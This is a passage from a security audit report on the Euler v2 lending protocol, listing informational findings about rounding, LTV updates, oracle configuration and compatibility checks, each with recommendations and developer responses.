The function calculateDTokenAddress()
is used to get the address of the dToken. It computes the deployment address of the EVM create
instruction and returns it.
Some chains, like ZkSync Era, have a different create
and create2
address derivation, which causes this function to return the wrong address.
Informational. The function may not work on all EVM chains.
Consider storing the dToken address.
Developer Response
2. Informational - isEVCCompatible()
check is insufficient
Technical Details
The function isEVCCompatible()
checks if a contract is compatible with the EVC by calling the evc()
method on it and checking that it returns the correct EVC address.
This check seems insufficient to assume that a contract is EVC compatible; some contracts/tokens may store the EVC address without being fully compatible.
Informational. Insufficient compatibility check.
Consider implementing an explicit isEvcCompatible()
function on the compatible contract that would return a magic value, similar to NFTs' support interface.
Developer Response
Acknowledged. The check is a best effort. Since the audit started, product lines have been deprecated in favor of a different design for verifying vaults using 'perspectives' contracts, which will be audited separately.
3. Informational - Product lines have the same token symbols
Technical Details
The escrow and core product lines both assign the vault token the symbol "e" + the asset symbol. Using the same symbols for different product lines may be confusing.
Informational. The same symbols for different product lines may be confusing.
Consider giving a different symbol prefix for each product line.
Developer Response
Acknowledged. Since the audit started, product lines have been deprecated in favor of a different design for verifying vaults, including their names and symbols, using 'perspectives' contracts, which will be audited separately.
4. Informational - Underlying asset is required to implement decimals()
According to the white paper, the vault takes its decimals from the asset or defaults to 18 if not specified. However, the implementation just forwards the call to decimals()
without any fallback.
Technical Details
26: function decimals() public view virtual reentrantOK returns (uint8) {
27: (IERC20 asset,,) = ProxyUtils.metadata();
29: return asset.decimals();
30: }
Update the docs or adjust the implementation to make the call to asset.decimals()
Developer Response
Fixed in commit 0118010f069dee7d5e76e5bfe1496ca53e065417.
5. Informational - Safe LTV update is not enforced
Technical Details
The governor can update or remove the LTV for an asset in the Governance module.
The setLTV()
function takes a rampDuration
as parameter to slowly update the LTV if it was already existing and if the new one is smaller. This way, borrowing positions don't get instantly liquidated and have time to adapt.
This rampDuration
has no minimum value enforced (it could be set to 0), resulting in an unsafe LTV update from the governor.
The clearLTV()
function doesn't take any rampDuration
and directly clears out the LTV, it also doesn't enforce that the LTV was set to 0 before removing it.
This can result in the governor clearing an LTV unsafely, putting borrowing positions at risk, and creating bad debt.
While the Governor is a trusted actor, it doesn't protect it from mistakes. Additionally, if some product lines allow third parties to create lending markets in the future, it is crucial to protect them from themselves.
An example is the recent Pacman LTV update that resulted in 24m$ liquidation.
Informational. While the governor is a trusted actor, mistakes could happen if different entities, not just Euler, create more markets.
Add a minimumRampDuration
in setLTV()
and check that the LTV is 0 in clearLTV()
before removing it.
Developer Response
Acknowledged. We confirm the functions setLTV
and clearLTV
are functioning as designed. It's ultimately the governor's responsibility to use them appropriately.
6. Informational - Loop might borrow more than specified
The loop()
function specifies an amount
of assets which is then rounded twice, potentially increasing the amount of debt taken.
Technical Details
The implementation of loop()
first rounds the assets up to shares and then rounds that number of shares back to the asset domain.
145: Assets assets = amount.toAssets();
146: if (assets.isZero()) return 0;
147: Shares shares = assets.toSharesUp(vaultCache);
148: assets = shares.toAssetsUp(vaultCache);
This is safe for the vault, but there might be differences between the desired amount of debt specified as an argument and the final calculated debt the borrower will take, which isn't documented.
Document the behavior. Alternatively, the function could directly take the number of shares to be minted, providing a better interface.
Developer Response
Fixed in commit 8886729eea5281941423b673794d755be98cc6ae.
7. Informational - Any collateral is considered as used when the account is unhealthy
When an account is unhealthy, collateralUsed()
returns the entire balance of any collateral, even if unrecognized for the controller.
Technical Details
The implementation of collateralUsed()
compares an account's liability with the amount of collateral provided and early returns the entire collateral's balance if the position is unhealthy.
74: (uint256 totalCollateralValueRiskAdjusted, uint256 liabilityValue) =
75: calculateLiquidity(vaultCache, account, collaterals, LTVType.BORROWING);
77: // if there is no liability or it has no value, collateral will not be locked
78: if (liabilityValue == 0) return 0;
80: uint256 collateralBalance = IERC20(collateral).balanceOf(account);
82: // if account is not healthy, all of the collateral will be locked
83: if (liabilityValue >= totalCollateralValueRiskAdjusted) {
84: return collateralBalance;
85: }
87: // if collateral has zero LTV configured, it will not be locked
88: ConfigAmount ltv = getLTV(collateral, LTVType.BORROWING);
89: if (ltv.isZero()) return 0;
This will happen for any collateral as long as it is enabled for the given account. There is no check to see if the collateral is recognized, and the 0 LTV check is done after the early return.
Informational. The collateralUsed()
function is primarily informational and only used in maxWithdraw()
and maxRedeem()
Check if the collateral is recognized in the controller's context before the health check.
Developer Response
Fixed in commit 59a4ac1cf6f90242c73d6cfda12c33cd5f7422fe - collateralUsed()
function is removed. maxWithdraw()
and maxRedeem()
return zero (underestimate) when collateral is used to support debt.
8. Informational - sDAI oracle can be implemented using ERC4626 conversion
The sDAI oracle implements the same logic as the vault's convertToShares()
and convertToAssets()
, which means that conversion can be directly resolved in _resolveOracle()
without the need of another contract.
Technical Details
SDaiOracle.sol can be replaced by configuring sDAI and DAI using govSetResolvedVault()
in EulerRouter.sol.
Remove SDaiOracle.sol and resolve the sDAI conversion directly in EulerRouter.sol.
Developer Response
Acknowledged - Ended up removing SDaiOracle entirely. Instead, EulerRouter is fully equipped to price sDai -> Dai after configuring sDai as a resolved vault in EulerRouter. Note that this means that the opposite direction, Dai -> sDai, cannot be priced this way, which we think is fine.
9. Informational - Consider updating Oracle adapters when deploying on Layer 2s
Technical Details
The current version of the codebase is expected to be deployed on the Ethereum mainnet.
It is important to note that changes might be needed for future deployments on other chains like layer 2s.
Because Layer 2s mostly use centralized sequencers, if the sequencer were to be down and then come back up, Oracles like Chainlink might return a price that looks fresh but is actually outdated.
This is due to the nature of sequencers, which process transactions one by one in order that were stored during the downtime.
Chainlink suggests setting a grace period
during which the oracle shouldn't be trusted.
Informational. Contracts will likely be updated when deploying on other chains.
Consider reviewing all Oracle adapters and adding a grace period
for Chainlink like suggested here.
Developer Response
10. Informational - Inconsistent rounding of vault debt
Debt is tracked using the Owed
data type, which provides extended precision. In most situations, it is rounded up when the debt is converted to the asset domain. However, there is an instance where the vault's debt is rounded down.
Technical Details
In initVaultCache()
, newTotalBorrows
is rounded down when updating the accumulated fees:
95: uint256 newTotalAssets = vaultCache.cash.toUint() + (newTotalBorrows >> INTERNAL_DEBT_PRECISION);
Informational. These are amounts that represent sub-wei magnitudes of the asset.
Acknowledge that the rounding down is intentional, or align them with the general behavior of rounding up.
Developer Response
Fixed in commit 6a6ec467d3f03b7e963888f7802d19e70344d6bd.
Final remarks
The Euler v2 is a complex yet elegant architecture comprised of three main components: the Ethereum Vault Connector (EVC), the Euler Vault Kit (EVK), and the price oracles. The EVK contains the majority of the code, as it is where the main lending logic resides. The documentation and the team's knowledge of their system demonstrate the significant effort put into its design.
The Euler v2 components were still in development during the audit and will likely receive more updates before deployment. The audited version lacked comprehensive tests, but auditors were able to follow the testing development conducted by the team in parallel with the audit. The Euler team was prompt in answering questions and actively involved throughout the audit, providing feedback and fixes swiftly when new findings were identified.
Some concerns were raised by the auditors regarding the system's complexity, particularly as it might be used as infrastructure by third parties who may not have the same security practices or knowledge as the Euler team.
The auditors look forward to seeing this new product join the evolving world of DeFi.